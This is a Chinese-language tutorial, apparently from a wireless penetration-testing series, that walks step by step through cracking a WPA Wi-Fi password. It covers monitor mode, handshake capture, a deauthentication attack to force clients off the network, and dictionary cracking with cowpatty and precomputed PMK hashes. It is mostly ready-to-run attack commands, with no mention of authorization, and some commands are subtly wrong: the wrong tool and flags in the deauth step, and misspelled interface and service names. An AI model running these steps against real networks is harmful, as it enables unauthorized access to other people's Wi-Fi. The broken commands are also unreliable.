首先还是老规矩,将不必要的进程关闭,并将网卡置入侦听模式。
service network-mannager stop
airmon-ng check kill
airmon-ng start wlan0
开始抓包并保存抓包数据。
airodump-ng wlan0mon –bssid ECxxxxxxxxB6 -c 11 -w wpa
此时当我用手机对WPA加密的AP进行连接后,如果抓包正常抓去了连接过程,则会在右上角显示 握手包抓取成功提示!这里我们可以看到并没有抓取到!这和无线网络本身不稳定有关。
为了成功抓取到握手包,我们可以采用 aireplay-ng 来强制让手机客户端与AP断开,进行重新连接!
airodump-ng -0 2 -a ECxxxxxxxxxB6 -c 68xxxxxxxxAA waln0mon
这里我们使其进行了两次重连。
我们回到抓包界面,此时我们可以看到已经成功抓取到握手信息。
拿到了握手包后,下面我们就可以正式开始破解了。
cowpatty -r wpa-01.cap -f /usr/share/john/password.lst -s kifi
我们看到密码也成功被破解 Password!
同样Cowpatty支持生成PMK的hash值的表,来达到破解速度的提高!
genpmk -f /usr/share/john/password.lst -d pmkhash -s kifi
利用生成的PMKHASH来进行无线破解。
cowpatty -r wpa-01.cap -d pmkhash -s kifi
相对于aircrack-ng 破解,cowpatty 更适合对一个固定目标的AP进行破解,否则重复生成PMKHASH并没有任何优势!
原创文章,转载请注明来源!即刻安全(secist.com)
文章地址:http://www.secist.com/?p=72&preview=true
转载请注明:即刻安全 » (六)无线渗透之Cowpatty破解